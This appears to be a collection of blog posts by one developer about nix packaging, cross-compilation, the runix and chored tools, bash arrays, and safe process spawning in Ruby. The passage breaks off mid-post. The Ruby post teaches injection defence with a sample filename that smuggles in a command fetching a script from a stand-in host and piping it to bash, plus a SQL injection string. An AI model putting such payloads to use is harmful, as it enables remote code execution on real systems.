(I’ve replaced the long /nix/store path with $out in this output for brevity)

./tools/install.sh -D -m 644 lib/libdl.a $out/lib/libdl.a
./tools/install.sh -D -m 644 lib/musl-gcc.specs $out/lib/musl-gcc.specs
./tools/install.sh -D -l libc.so $out/lib/ld-musl-x86_64.so.1 || true
# ... many more

This tells me two things:

this file doesn’t have an explicit permission mode like the others (-m 644).
it’s using a custom ./install.sh to do the installation

Sometime during this process I remembered a relevant question:

Do symlinks even have permissions?

No, they don’t:

The symbolic notation, lrwxrwxrwx, is the only set of access permissions a symbolic link can have. Additionally, these permissions are only representative as they are never used for any operation.

But… Huh?

Oh, Macs are different, symlinks can have permissions on a Mac. So now we’re firmly in niche territory, having Mac-only issues cross-building a linux-only program.

OK, time to look at this now-suspicious ./install.sh. It has some chmod code, could that be the problem? Unlikely, remember the problematic file didn’t specify any permissions. Why would it, symlinks don’t have permissions. But just a few lines above the chmod, a smoking gun:

umask 077

Gotcha. It’s hard to accidentally chmod a symlink, as you need to pass in the nonstandard -h flag to operate on the link instead of the thing it points to. But umask is used to restrict default permissions for any kind of file creation. Including, presumably, symlinks on MacOS.

There’s a couple of ways to fix this, the easiest it just to change this chmod line so that it allows read access. So my fix is to relax the chmod to 022; i.e. prevent write access but not read or execute.

Testing changes

Now that I think I have a fix, can I test it?

Of course. The steps I used are:

1. Make the change

I check out the musl git repository and make changes locally (in this case, modifying the umask line in install.sh)

2. Integrate it into nix

To integrate my changes I could alter the nix expression’s src to point to a fork of the source code. But for simple changes it’s usually easier to iterate by adding a patch. So first I generated a patch based on my changes in git (git diff > musl.patch).

Then I added that to the existing list of patches in the nix expression (here). For testing out changes, I just use an (absolute) file path to reference the patch file on disk. This will only work on my system, but it allows me to make changes and have them picked up immediately, without needing to update any digest / commit IDs.

3. Test it

With that patch added, I rebuilt my musltest.nix test case, and success the resulting symlink has read access. Looks like I’ve fixed it!

Integrating changes

Now that I’m confident the fix works, I want to integrate it into my actual project. After all, this all started with me wanting to build some software, not muck about in musl’s custom installer.

In order for the fix to be usable outside of my machine, I need to:

get the patch online. I push my changes to github and use that to serve a patch file
update the nix expression in my fork of nixpkgs to include the patch
pin my project to use my nixpkgs fork (there are plenty of ways to manage this, I like using niv)

And… that’s it!

Eliminating the Software Distribution Chasm

Of course, all of these things can (and are) routinely done by people without nix. You don’t need superpowers to fix bugs in software.

But nix dramatically widens the amount of things I feel empowered to fix, as well as giving me confidence that I will be able to reproduce or modify anything I need to. And not just on my machine - any changes I can make locally, I can also ship to my users, no matter how deep in the stack the fix is.

Mentally I think of this as a distribution chasm. Outside of nix, there’s often this huge gap between the workflow and capabilities of what you can do on your machine, vs the very different workflow and capabilities there are for distributing software to others.

For example: say you use Ubuntu, and you find that musl is broken in some obscure way. I’m sure there are plenty of debian tools I don’t know about which allow you to get a deb package, set up a build environment, make changes to the source code, and then rebuild a modified package against those sources.

But then once you have a fix, how do you use it? Do you send it to the Ubuntu or upstream maintainers, and wait for your users to get the update via official channels? That’s a lot of waiting, possibly years depending on when your users upgrade their OS. Maybe you can set up your own deb repository (ugh!) so you can at least run your modifications in CI, but it’s a horrible thing to ask of your users. Not to mention you’re modifying the global version of e.g. musl they have installed, which is a pretty invasive thing to be doing.

So the user-friendly option would be to eject from package management and leap over the distribution chasm - you have to distribute your musl fork yourself, perhaps by committing it into your project (vendoring), or writing a script to build it from source as part of your project’s build. But wow, now your project takes on all the complexity of building musl.

And for what? The fix was embarrassingly simple. It’s just a single line of bash. (Aside: there are workarounds for this particular bug; but those wouldn’t work if it were a change to some C code).

Anecdotally, I tried building musl outside of nix, but I immediately ran into unrelated compile errors. That’s not unusual when first compiling an unfamiliar project, and it’s easy to give up at this stage. But using nix? After a few hours I’d diagnosed, fixed, tested and submitted a fix upstream. And while I wait, I’ve integrated that patch into my software, so I can keep building. It works on my machine, in CI, and for other contributors, with no need for manual setup. Feels like a superpower to me.

Indoor Skydiving

2023-01-23T00:00:00+11:00

Off-topic for this blog, but I have done a few indoor skydiving sessions over the past year at iFLY Melbourne. This is some video from my third session. It’s pure fun and I recommend it to anyone, you get the feeling of flying without the hassle and terror of jumping out of a plane :)

Nix cross-compilation: what even is it?

2022-12-19T00:00:00+11:00

I don’t blog much these days, apparently I just use it to announce roughly one new thing each year. But I do want to post more writing, so here’s a description of how I think about cross-compilation in nix.

This post doesn’t assume much nix knowledge. It’s not a how-to post describing the (complex) process of how to cross-compile software, it’s more of an exploration of how cross-compilation conceptually works, because it’s something I learnt recently and found interesting.

What is nix?

Nix is an operating system, a programming language, and a massive (80k+) set of software packages written in that language. Today, we’re focussing on nixpkgs, the set of packages.

What is cross-compilation?

Most software is not cross-compiled. Typically you build software on a computer, and run it on the same kind of computer. Easy peasy. You want a Linux binary? Compile it on a Linux computer or VM, my friend.

But cross compiling means building a native executable for a different kind of computer. The standard terminology here is that the place where you build is the Build platform, and the place where you will run it is the Host platform. There’s also a concept of a Target platform, but that’s a historical oddity and doesn’t matter for modern compilers.

In my case, I’ve been writing some rust software and building it on a Mac. But I want to run it on Linux too. I could do a bunch of stuff with docker, but that’s boring. And more seriously I also want to compile for the newer ARM-based Macs, without having to juggle multiple computers.

To cross-compile a trivial rust app, I’d need a rust compiler on my Mac, and I’d tell it to build myApp as a Linux binary, using --target=linux-x86_64. Rust is a clever modern compiler, it can produce binaries for many supported targets out of the box.

But this doesn’t work for non-rust shared libraries. If you have a rust library which links against openssl for example, the one you have on your system is going to be the Mac one, not the Linux one. Oh dear.

Dependency injection

Nix uses a pattern not usually found in package definitions, but very common in programming: dependency injection.

Each package is not a static thing like a YAML file, but rather a function which requires some dependencies, and then produces a result - the fully concrete specification used to build some software. Here’s a stripped-down version of the GNU hello world program to demonstrate:

{ stdenv, fetchurl }:

stdenv.mkDerivation (rec {
  pname = "hello";
  version = "2.12.1";

  src = fetchurl {
    url = "mirror://gnu/hello/hello-${version}.tar.gz";
    sha256 = "sha256-jZkUKv2SV28wsM18tCqNxoCZmLxdYH2Idh9RLibH2yA=";
  };
})

This is a function which accepts two named dependencies (stdenv and fetchurl), then returns a derivation, which is the concrete type that nix knows how to build, producing files on disk.

fetchurl is a straightforward utility - it takes a URL and a checksum, and does the job of turning that into local files. If hello had any package dependencies, they would be passed in a similar way.

stdenv is a little more mysterious, it’s just “the standard environment”. Its mkDerviation function is ubiquitous in nixpkgs, and I don’t tend to think much about it.

That changed recently, when I started digging into cross-compilation.

The Nix package universe

Zooming out, nixpkgs defines this universe of package expressions. Like I said, there’s more than 80 thousand of them. Here’s a dramatically simplified version:

And they’re lazily evaluated, which is how you can get away with a single expression containing the entire universe. If you evaluate a single package, it will only load/evaluate the stuff it depends on, not the entire universe:

The interesting thing is, every single package uses this same pattern to depend on stdenv. This is where it gets interesting.

stdenv.mkDerivation is this ubiquitous function which takes some attributes and returns a derivation - the concrete thing to build. And it’s injected into each and every package:

Different stdenvs

It turns out, there isn’t just one but many different implementations of stdenv you could inject.

The fun one for today is the one which knows how to build stuff on a Mac, and produces Linux code.

If you inject this stdenv into the expression that builds a nix universe, you get a second universe where that stdenv is being used to build every single package in the universe. This is the universe of those same 80 thousand packages, except each of them are built on mac, producing binaries that run on Linux.

The Nix package universe multiverse

So the final slightly mind blowing thing, is that the different universes are linked.

This build-for-linux stdenv automatically knows that for packages specified in the buildDependencies list, each should actually be taken from the normal build-for-Mac universe. Whereas a runtime dependency like openssl or libc needs to be taken from the current build-for-linux universe.

In practice there’s way more dependencies, but this is the general shape:

And notice how we actually have two versions of libc here. Rust needs a Mac libc at build time, while my app needs a Linux version at runtime.

How this inter-universe connection is actually implemented is pretty wild for historic reasons, but thankfully you don’t have to know too much about that to make use of it.

Is this novel?

Typical distributions like Debian have this whole multi-arch packaging system where the architecture becomes part of the package key.

That obviously works, Linux package managers are extremely competent at cross-compilation and I’m assuming it’s a perfectly reasonable system. But with nix, you can just build as many different universes as you want. By plumbing together expressions that refer to other expressions in a particular way, it produces a cross compiled binary without requiring cross-compilation support from the nix language or nix-build tool itself.

So… yeah. I learnt this recently when working on runix and I just enjoyed this strangely beautiful mix of compiler toolchain hacking and elegant functional programming concepts.

Ok so how do I actually… cross compile stuff?

Unfortunately, actually learning the ins & outs of writing and debugging nix expressions for cross-compilation can be quite tricky. My additional overlay for cross-compiling runix is not pretty, and it took a lot of trial and error to get this working. But the results are pretty amazing, because now I can build everything on a single machine, fully automated with no need to install various toolchains.

These are some resources I found helpful when learning cross-compilation in nix, hopefully they help if you want to dive deeper:

nix.dev: Cross Compilation
NixOS wiki: Cross Compiling
How to Learn Nix, Part 30: Cross-compilation - an extremely detailed newcomer’s diary to cross compilation, helping to digest some of the rather dense nix manual content
fenix: rust cross compilation linking

runix: run nix software without nix

2022-11-26T00:00:00+11:00

I think nix is fantastic. Language-agnostic, cross-platform, reproducible, cacheable software building and distribution. It’s not an easy thing to learn, but the payoff is tremendous.

But one thing about nix is that you typically need to be all-in. When building software, this makes sense - Nix’s reproducibility only works if all your dependencies are themselves available within nix. But as a colleague casually suggested one day: shouldn’t it be possible to run nix-built software without installing nix?

I told him a few reasons why it’s harder than it sounds, mainly due to the hardcoded /nix/store path which is assumed by the entire ecosystem. But my mind dwelt on it in the background, and it turns out it turned out to be much easier than I first thought.

Runix

So, I’m announcing runix, which does just that - it’s a small, unobtrusive executable which allows running nix software from any binary cache. Features:

small (<4mb compressed)
fast (~10 microsecond overhead after initial download)
no configuration required
unobtrusive (no need for root access or a /nix directory)
can use software from any nix-compatible binary cache (including cache.nixos.org and cachix)
conveniently distribute software via runscripts

Runscripts are a runix invention, they’re a tiny wrapper around a list of derivations and binary caches. In addition, they support:

self-bootstrapping (install runix itself if missing)
multiplatform (execute a different nix derivation per platform)

runix intentionally lacks all the development and authoring features of nix itself - you can’t evaluate nix expressions or build software locally, you can only run existing software which someone else has built and pushed to a binary cache. But for distributing software, it’s a much easier way for users to access nix-built software.

Introducing `chored`

2022-05-18T00:00:00+10:00

chored is a utility for handling repetitive chores and files.

There are many repositories. Lots of them have similar (tedious!) things they need to do, which aren’t particular to that repository:

building
linting
testing
generation of configuration for tools:
- CI configuration
- build settings
- all sorts if common or shared files
release management
documentation generation
pull request automation
updating dependencies

chored allows you to reuse solutions to these problems, and any others you can think of. It’s minimally intrusive and lightweight (just add one small wrapper script to your repo).

And even when tasks aren’t exactly the same, chored facilitates code reuse as easily as importing a URL, but as powerful as real libraries in a real programming language (because it is both of those things).

“Like Github actions?”

It allows much better sharing of functionality (without the vendor lock-in and awkward abstractions), but it just executes code - you can run it on your machine or within CI, ideally both! To help with this is also has builtin functionality for generating github workflow files to run chores in CI.

“Oh, like a rake task. Or an NPM task. Or [plenty more task runners]”

Kind of! I consider those heavyweight though, because they bring in a dependency manager with its own configuration and stateful lifecycle. They’re also only about tasks, while chored expects you’ll also use it to generate repetitive files.

The closest project I know of is probably projen, except projen’s focus is on extensive file generation for specific project types, while chored has less extensive project types and more focus on the task system. chored is also simpler because it relies on deno and Typescript, while projen supports multiple languages.

Lightweight, stateless dependency management:

Basically, I want to remove this:

$ yarn run mytask
# (it doesn't work)
$ yarn install
# (it still doesn't work)
$ rm -rf node_modules && yarn insall
$ yarn run mytask
# (it works :facepalm:)

And this:

$ rake mytask
rbenv: version `2.6.5' is not installed

# (take a deep breath)
$ rbenv install `cat .ruby-version`
$ rbenv exec gem install bundler
$ rbenv exec bundle install
$ rbenv exec bundle exec rake mytask

(this can be written more tersely, but that often makes it more confusing, not less)

With most package managers, your system (the state of files on your machine) is typically out of sync with the desired state. You need to yarn install etc to bring them in sync, after every change.

With deno, your system can’t be inconsistent, it may just have some uncached imports.

anyone running a given module will use the exact same dependencies, regardless of the state of your machine (it’ll just be slower from an empty cache)

Lightweight abstraction:

At its heart, a chore definition (choredef) is simply a function, accepting a single arguments object. This can be whatever shape you need, and you can make fields optional or mandatory in the usual typescript way.

./chored collects your commandline arguments into an object, and passes this to your chosen chore. Here’s what a trivial greet chore looks like, it accepts no options and prints a simple message:

// choredefs/greet.ts
export default function(opts: {}) {
   console.log("Hello, world!")
}

Types!

Chored uses typescript throughout. When invoking a chore, it typechecks the arguments you provided on the commandline with the arguments accepted by that chore. If you’re missing something, or pass in the wrong type, or pass in an option that isn’t recognised, you’ll get an error. Nice.

Of course, the benefit of types extends to writing your own chores, reusing third party modules, etc.

Files!

Sometimes you want to run a thing right now. Other times, you want to generate a file to tell your CI system to run a thing at some other time. Or maybe you just want to generate some super standard boilerplate files across many repos, like compiler / linter config, LICENSE files, release scripts, etc.

You could even build a kubernetes abstraction within chored - you design the input types and then implement conversions to YAML files that you either keep on-disk or send directly into kubectl apply.

Chored has first-class support for generating files - in fact, the chored script in your repository is managed via this file rendering chore, so updating that chore will also bring in any changes to the chored script. How meta!

Background - how I got here:

Chored is not my first attempt to solve this problem. Previously, I built dhall-render and dhall-ci, which were based on an experiment I pursued in my day job. These together aimed to solve the problem of generating files, with many of the same goals.

However even though I’m quite pleased with the results, there were some downsides that come from only generating files, and not being able to execute arbitrary logic.

you end up generating a lot of scripts, which clutters a repository (ususally written in bash or dependency-free ruby) To avoid the clutter I experimented with generating Makefiles, which is clearly a red flag considering how much I hate automake!
you end up pushing logic through awkwardly-shaped holes
- where in a real language you might do some logic based on $GITHB_HEAD_REF or $GITHUB_REF to detect the branch name across both push and pull_request github events, when generating files you have to serialize that as inline bash expressions, and those are not pretty, and definitely not readable.
generating files can help with declarative systems like github actions, but there’s tremendous value in deemphasizing this kind of vendor-specific solution. chored encourages me to write code that also works outside of github actions, because it’s so much more convenient to use and test.

More recently, I also encountered projen. While I find it too cumbersome to adopt wholesale due to its support for multiple languages, I realised that I really wanted some of the benefits afforded by its implementation - notably the task system and the excellent support for Typescript in most editors.

nix-wrangle: Manage nix sources and dependencies with ease

2019-10-13T00:00:00+11:00

Update:

Doing things my own way is too much effort, I just use niv these days :)

My last post was more than a year ago, in which I described my long journey towards better package management with nix.

Well, it turns out that journey wasn’t over. Since then, I’ve been using the tools I created and found them unfortunately lacking.

So, I’ve built just one more tool, to replace those described in the previous post.

I’m writing this assuming you’ve read the previous post, otherwise I’d be repeating myself a lot. If you haven’t, just check out nix-wrangle and don’t worry about my previous attempts ;)

Step 7: nix-wrangle for development, dependency management and releases

After a lot of mulling over the interconnected problems described in that previous post (and discussions with the creators of similar tools), I came at it from a new direction. Nix wrangle is the result of that approach. I’ve been using it fairly successfully for a while now, and I’m ready to announce it to the world.

How does it differ from my previous state of using nix-update-source and nix-pin?

One JSON file for all dependencies, allowing bulk operations like show and update, as well as automating dependency injection (since all dependencies are known implicitly).
A splice command which takes a nix derivation file, injects a synthetic src attribute baking in the current source from the nix-wrangle JSON file. This allows you to keep an idiomatic nix file for local development (using a local source), and automatically derive an expression using the latest public sources for inclusion in nixpkgs proper.
Project-local development overrides. The global heuristic of nix-pin caused issues and some confusion, nix-wrangle supports local sources for exactly the same purpose, but with an explicit, project level scope.

Please check it out if you use nix! And if you don’t use nix, check that out first :)

A journey towards better nix package development

2018-05-12T00:00:00+10:00

Update:

Doing things my own way is too much effort, I just use niv these days :)

This post is targeted at users of nix who write / maintain package derivations for software they contribute to. I’ve spent a lot of time doing (and thinking about) this, although it’s probably quite a niche audience ;)

tl;dr: you should check out nix-pin and nix-update-source if you want to have a happy life developing and updating nix expressions for projects you work on.

I believe nix is a technically excellent mechanism for software distribution and packaging.

But it’s also flexible enough that I want to use it for many different use cases, especially during development. Unfortunately, there are a few rough edges which make a good development setup difficult, especially when you’re trying to build expressions which serve multiple purposes. Each of these purpose has quite a few constraints:

Purpose 1: Inclusion in nixpkgs proper

This is in some ways the most restrictive part - if I didn’t need to include my packages in nixgpks, I could make my derivations as funky and complex as I like. But there’s a lot of value to being in nixpkgs. The general constraints are that nixpkgs derivations should be idiomatic and functionality which isn’t needed for nixpkgs is frowned upon:

simple packages should be a single function which takes its dependencies in a callPackage-compatible way
splitting a simple derivation across multiple files is frowned upon (e.g. for the purposes of a common build.nix but different src.nix between nixpkgs and your upstream repository)
externalizing attributes into a machine-readable / writable format (e.g. JSON) for easy automation will get your changes reverted (sadly)

Purpose 2: Allowing easy updates

Updating a package in nix is kind of tedious. For a typical github-hosted package you’ll need to update the rev attribute to the new version, but then you also need to update the sha256, and that’s not actually trivial. There are two options:

run `nix-prefetch-url on the github tarball address, or
break the existing sha256 attribute by modifying one or more characters (you can’t use an empty digest, that won’t get past the sanity checks), then:
- build your package
- copy-paste the correct sha256 from the error message into your package definition

I can never remember github’s tarball format, so both of these are pretty tedious. It may not be that much work each time, but the more packages (and versions) you commit to nixpkgs, the more this feels like a computer should be doing the tedious part for you.

Purpose 3: Standalone development (i.e. as part of the project being built)

I don’t know how common this is, but I keep nix expressions inside all of my repos. I think it’s a good idea to version your nix expressions with your code, especially when you’re working on changes to both at the same time. And since I love nix, why wouldn’t I want all of my projects to have a nix expression so I can get dependencies setup trivially and know that my build works, without accidentally depending my system environment?

Sometimes they’re just shell.nix files used for development, but a lot of the times they’re fully buildable nix derivations.

For the packages which are in nixpkgs, I want to keep a verbatim copy in my repo, but I still want the repo copy for testing changes, and so anyone with a copy of my project also has the appropriate build expression for any given revision.

Purpose 4: Inter-project development

This one may be quite uncommon, but I’ve ended up running into it a lot. The scenario is that I have some package base, and package app which depends on base. I want to either add a feature or fix something broken in app, but it turns out this requires fixes to either the source code or the nix expression for base. Now you can’t just make changes in one repo, but you need to build & integrate changes across two (or on a bad day, a whole handful of) projects.

Attempts I’ve made in the pursuit of a perfect workflow

You could probably skip to the end if you just want to know where I’m at now, but I think it often helps to explain the journey, so you know what problem I’m trying to solve, what attempts I’ve made that didn’t work out well enough, and why.

Step 1: Nothing fancy

When developing a nix expression, use only public, tagged archives.

This is fine for a long-running or third-party project, where you don’t need (nor have access) to make changes to the project itself. All you’re doing is wrapping it up in a nix expression, and updates to your nix expression come after upstream source code releases.

However, what about when the upstream project is your project. And what if you want to make sure your nix expression works as expected before you release a new version, so that you can fix anything which is broken? I really want to be able to test changes that I make end-to-end, and that includes testing that it’ll actually work in nix.

Another awkward issue is that you typically need two expressions - a default.nix which can be called with nix-build, and a myPackage/default.nix which accepts its dependencies as arguments. This typically just means default.nix just does a callPackage on myPackage/default.nix, but this is a piece of boilerplate you need in each project.

Problems:

Every change to the source code must be versioned, tagged, pushed and released before you can update or test your nix derivation. This is extremely limiting for iterative development, as you may end up publishing a number of broken versions because you haven’t tested them.

Step 2: Scripted updates

Even when you’re doing the simplest possible thing, bumping a package version in nix is kind of tedious. For a typical github-hosted package you’ll need to update the rev attribute to the new version tag, but then you also need to update the sha256. It’s not hard, but it’s pretty annoying and clunky - the more you do it, the more convinced you become there must be a better way.

The straightforward way to automate updating source code (nix is a programming language, not a data format) is typically to extract the automatable bit into its own, simple file format. For example, if I was generating some data for a python program I wouldn’t try to modify python source code in-place, but I’d instead generate a JSON file, then use python’s JSON support to load in that file.

The same can be done with nix - we can store the arguments to fetchFromGitHub in a JSON file, and import that from our nix expression. It’s pretty easy to write a program to read & update a JSON file without needing to be able to edit nix source code. So I did, and it’s called nix-update-source. After much debate, I finally got it merged only to have it reverted a week later by edolstra (the creator of nix himself!) because he disagreed with the approach :(

So I ended up adding the option to modify nix source code inline (instead of generating JSON) using a hacky regex-based approach. For derivations that need to be accepted by nixpkgs, this is best option to avoid causing a stink.

Bonus tip: you can add an updateScript attribute to embed your update process into each package itself (here’s an example), and use nix-shell maintainers/scripts/update.nix --argstr package MY_PACKAGE to invoke it.

Problems:

This is an improvement, but (as in Step 1) it still requires all changes go through the release process before you can test them.

Step 3: Anonymous git SHAs

Rather than fetching a specific git tag, you can use fetchgit to fetch a specific commit by its SHA. This means you can push commits to some testing branch, and use that to test out changes to your nix expression. When you’re happy, squash / rebase / merge the changes and update your commit to the published version.

Problems:

You still need to push your commits somewhere public (e.g. github), so if you’re doing a lot of back and forth you’ll be committing / amending a commit, pushing, and then updating your src attribute before you can test the new version.
People push back against using fetchgit in nixpkgs proper, since it’s less efficient than fetchFromGitHub (you’re cloning a full repo and depending on git, rather than fetching a single tarball). And it’s hard to justify, since each of your updates are to published versions, it’s only the work-in-progress versions which require anonymous commits.
You’ll want to script this somehow, because forgetting to update the commit ID or digest will silently run your old code instead of the code you think you’re testing.
You need to manage multiple branches if you don’t want testing commits going to master, and remember to update your commit ID and digest after merging / rebasing.

Step 4: Add a second derivation which uses a local tarball

This technique involves multiple nix expressions - one for the local tarball version, and one for the official published version. You can go about this in a few ways:

Option 1: use overrideDerivation to inject your local source, e.g.:

# local.nix
with import <nixpkgs> {};
lib.overrideDerivation (callPackage ./default.nix {}) (orig: {
	src = ./local.tgz;
})

Option 2: inject src as part of a second set of arguments. e.g:

# build.nix
{ stdenv, lib, curl, python }:
{ src, version }:
stdenv.mkDerivation {
	inherit src version;
	# ...
}

Option 2 is nice from an engineering perspective - there’s no “default” src, you have to explicitly provide one. When using Option 1 it’s easy to accidentally reference src in a way that overrideDerivation would be unable to intercept (e.g. by referencing it in your buildPhase directly), which ends up with very confusing issues.

I did actually get away with this. But not without sideways glances from nixpkgs maintainers about it being weird - it’s certainly not idiomatic.

Problems:

You still need to script the creation of a tarball somehow. I came up with a handy script, but it assumes you’re using the gup build system and I have to copy it into every project.
You need multiple nix expressions (local and published), which can get confusing.

A third option is just to use ./. as the source, skipping the whole tarball business. But I don’t like that, because:

it’s unnecessarily slow and wastes disk space to copy the whole directory into a new store location on every build, including ignored files (not much fun with hundreds of megabytes of node_modules or built VM images)
now your derivation needs to handle src being either a directory or a tarball. It’s kind of awkward.

Step 5: Use local tarballs and environment variables

The trouble with having a separate nix expression for your local version is that it’s not used by anyone else. Let’s say I have a project b which depends on a. I need to add a feature or fix an issue with b, but that also requires altering a in order to support that feature / fix.

If I’m building a off a local tarball in local.nix, project b won’t be able to see that since it’s using the official expression for a (which lives in nixpkgs, or is perhaps fetched from git). I could modify a temporarily to use the local.nix version instead, but that’s an awkward thing to juggle (and remember not to commit), especially when there are more than just two packages involved, and when this is a common part of your workflow. And if a is fetched from git instead of living in nixpkgs, then I’d also need to publish my changes before I can use them in b. And then what if I have a package c which wants to use my local modifications to both a and b?

So I started introducing environment variables to switch between published and development versions. e.g. each project depending on opam2nix would respect an $OPAM2NIX_DEVEL variable which caused it import that derivation instead of the published opam2nix. I could then set this variable while testing changes, and not worry about this change accidentally making its way into my source code.

Problems:

Similar to “Step 4”, plus more complexity - even I get confused as to what version of which packages was being used where.
Nobody wants this in nixpkgs, it’s ugly and weird.
I don’t think it would even work for a multi-user setup.

Step 6: nix-pin for development, nix-update-source for releases

a.k.a hopefully the end of this journey?

I have built what I think is a pretty workable solution for local testing while also keeping your derivations completely idiomatic for easy acceptance in nixpkgs.

The development tool is called nix-pin, and it’s a small, generic tool for splicing local checkouts of a project into nixpkgs in an unobtrusive way. You can read the readme for the full details, but the basic workflow is:

checkout a project to work on (which contains its own nix expression)
add this project as a pin - you give it a name, a path, and the path to the nix expression inside the repo

You can now use nix-pin build / nix-pin shell instead of nix-build / nix-shell, to run a version of nixpkgs where the pins on your system are automatically spliced into nixpkgs. You can explicitly update a pin to include all uncommitted changes in your working directory, or pin a project to a specific git SHA. If you’re building a pinned package you’ll get the pinned version, and if you’re building any package that depends on a pinned package¹, it’ll get be the pinned version which is injected.

When it comes time to actually release commits that you’ve tested with nix-pin, you can use nix-update-source (although you don’t have to if you have your own release workflow).

It’s kind of simple when you describe it, but the big advantage is that your nix expressions don’t need to be aware of nix-pin. Your nix expressions stay idiomatic for easy inclusion in nixpkgs, and it already works with any idiomatic package definition you’ll find in nixpkgs.

nix-pin is still experimental, and there’s a chance it might break under certain awkward cases. But I think the idea is sound, and I’d love to see it get more adoption within the community, because I really think it can make development with nix much less painful.

If you’re wondering how that’s possible, the actual rule used is to substitute a pinned derivation whenever an argument whose name matches that pin’s name is provided by callPackage. This works out of the box for the huge majority of derivations. ↩

Bash arrays and `set -u`

2016-09-17T00:00:00+10:00

Often you need to progressively build up a set of commandline arguments in bash, like so:

FLAGS=""
if [ -n "$LOGFILE" ]; then
  FLAGS="$FLAGS --log $LOGFILE"
fi
someprogram $FLAGS ...

This usually works, but is a bit rubbish:

this will break if $LOGFILE has a space in it, because bash will split it into multiple arguments
adding a flag is kind of tedious with the FLAGS="$FLAGS ..." boilerplate
$FLAGS ends up with a leading space, which is entirely fine but still feels ugly

Arrays solve these issues nicely. They can store elements with spaces, and there’s a nice append syntax:

FLAGS=()
if [ -n "$LOGFILE" ]; then
  FLAGS+=(--log "$LOGFILE")
fi
someprogram "${FLAGS[@]}" ...

You need to remember the weird "${VAR[@]}" syntax, but you get used to that (writing "$@" to pass along “all of this scripts arguments” is actually shorthand for "${@[@]}", which may help you remember).

Problem: “there’s no such thing as an empty array”

The problem is that in bash, an empty array is considered to be unset. I can’t imagine any reason why this should be true, but that’s bash for you. My problem is that I always use set -u in scripts I write, so that a command will fail if I reference a variable which doesn’t exist (just like a real programming language). But in bash, this will fail:

$ set -u
$ FLAGS=()
$ echo "${FLAGS[@]}"
bash: FLAGS[@]: unbound variable

Ugh.

The solution is even more weird bash syntax:

$ echo ${FLAGS[@]+"${FLAGS[@]}"}

(thanks, Stack Overflow)

Which roughly translates to “if FLAGS[@] is set, then insert the value of FLAGS[@], otherwise expand to nothing”.

Note the placement of the quotes - quoting the first instance of ${FLAGS[@]} will lead to an empty string argument (instead of no argument) if $FLAGS is empty. And failing to quote the second instance of ${FLAGS[@]} will mean it breaks arguments on spaces, which was the whole reason we used an array in the first place.

One more trick in your bag of weird bash tricks

Depending on your outlook, this is either another useful trick to help you write more robust bash, or yet another example of how bash actively discourages decent programming practices, highlighting how you really really really shouldn’t use bash for anything nontrivial.

Running a child process in Ruby (properly)

2016-08-02T00:00:00+10:00

(cross-posted on the Zendesk Engineering blog)

We use Ruby a lot at Zendesk, and mostly it works pretty well. But one thing that sucks is when it makes the wrong solution easy, and the right solution not just hard, but hard to even find.

Spawning a process is one such scenario. Want to spawn a child process to run some system command? Easy! Just pick the method that’s right for you:

`backticks`
%x[different backticks]
Kernel.system()
Kernel.spawn()
IO.popen()
Open3.capture2
Open3.capture2, Open3.capture2e, Open3.capture3, Open3.popen2, Open3.popen2e, Open3.popen3

… and that’s ignoring the more involved options, like pairing a Kernel#fork with a Kernel#exec, as well as the many different Open3.pipeline_* functions.

What are we doing here?

Often enough, you want to run a system command (i.e. something you might normally run from a terminal) from your Ruby code. You might be running a command just for its side effects (e.g. chmod a file), or you might want to use the output of the command in your code (e.g. tar -tf to list the contents of a tarball). Most of the above functions will work, but some of them are better than others.

In order to narrow this down, I’m going to make some assumptions:

(aside: there are pure-Ruby ways to perform the tasks in these examples which are likely to be more secure and simpler than invoking an external program written in C. But for clarity I’ve chosen simple examples over realistic ones)

Assumption 1: let’s not get hacked

You’ve probably heard of SQL injection - if you build up a string like "select * from users where name = '#{username}'", someone will eventually come along and submit a form where username="'; drop table users; --'".

Whenever you include untrusted data as part of code, you’re likely to see similar issues. SQL is code, which is why we need to cleanly separate SQL commands (trusted) from SQL values (untrusted). This can be seen in ActiveRecord with examples like User.find_by(['name = ?', params[:username]]). This doesn’t just smush all the data together, but instead gives it to the SQL processor in a way that it can distinguish code from data.

Of course, sh (or bash) is a very powerful language - if you make similar errors when invoking subcommands, you can easily allow hackers to do all sorts of nasty things. Consider some code to figure out the dimensions of an uploaded image. One way to do that in ruby (with imagemagick installed) is:

dimensions = `identify -format '%w x %h' #{filename}`

This will probably work, until someone decides to upload an image named '; curl pwnme.example.com | bash ;#.jpg'

Oh dear, I hope that domain doesn’t host a malicious script of some sort. And I really hope your account doesn’t have passwordless sudo.

Even if your application is only accessible to users you trust, this is still bad code. For example, it will fall over as soon as someone uses a filename with a space in it. Encoding data correctly isn’t just a matter of security - insecure code usually turns out to be buggy as well! And “only trusted users can trigger this code” is one of those statements which can cause an avalanche of curse words months or years down the line when that silently (and then loudly) stops being true.

The solution for running a command is simple: rather than providing a string to be executed by /bin/sh, we give the command and its arguments directly as an array of strings. No splitting on spaces, no escaping quotes, no special characters whatsoever. So instead of:

"ls -l #{directory}"

We want to provide:

['ls', '-l', directory]

As a bonus, this cuts out the sh interpreter altogether. This saves us the tedious work of applying sh escaping rules, running a mostly useless sh process, and conveniently sidesteps exploits like the shellshock bug.

Assumption 2: silent errors are bad errors

I have a vendetta against all forms of unhandled error. They pop up in a lot of places:

sloppy C code (whenever you forget to check for errors explicitly)
a startling amount of bash scripting (unless you set -eo pipefail or meticulously check for failed commands with $?)
do_something(obj) rescue nil

That last one’s at least explicit about it, but it’s still a big hammer to swing - maybe you expect do_something(obj) to fail with a certain error when obj is nil. But what if someone introduces some other bug into do_something which fails for a completely different reason? You’re much better off either checking for the nil up front, or rescuing only very specific exceptions.

So if you want to run a shell command, you’d better be checking that the command actually returned with a successful exit status. If you think “this could never fail”, do it anyway. If you’re right, you’ve made sure of it and may proceed to feel smug. If you’re wrong, you might save yourself mild annoyance, hours of debugging, or catastrophic data loss. It’s a win-win.

Elimination round

OK, so firstly anything that uses a plain sh string is out. That knocks off the two most convenient options:

backticks
%x[backticks in a funny hat]

The remaining functions accept either a string or an array, so you need to be diligent in making sure you give them an array.

Now, which of these has the best error handing?

Firstly, a lot of these don’t return a status directly. They set the global $? object. This is mostly reliable, but kind of icky (it’s a global!)

On the plus side, it’s a thread-safe global - ruby plays some tricks to make sure it always refers to the last process for this thread.

But it’s still ugly, and while writing up some examples for this post I discovered a sneaky issue with it that I’d never encountered before: it doesn’t always mean what you think it means.

Consider this code:

listing = IO.popen(['ls', directory]).read
raise "it failed!" unless $?.exitstatus == 0
return listing

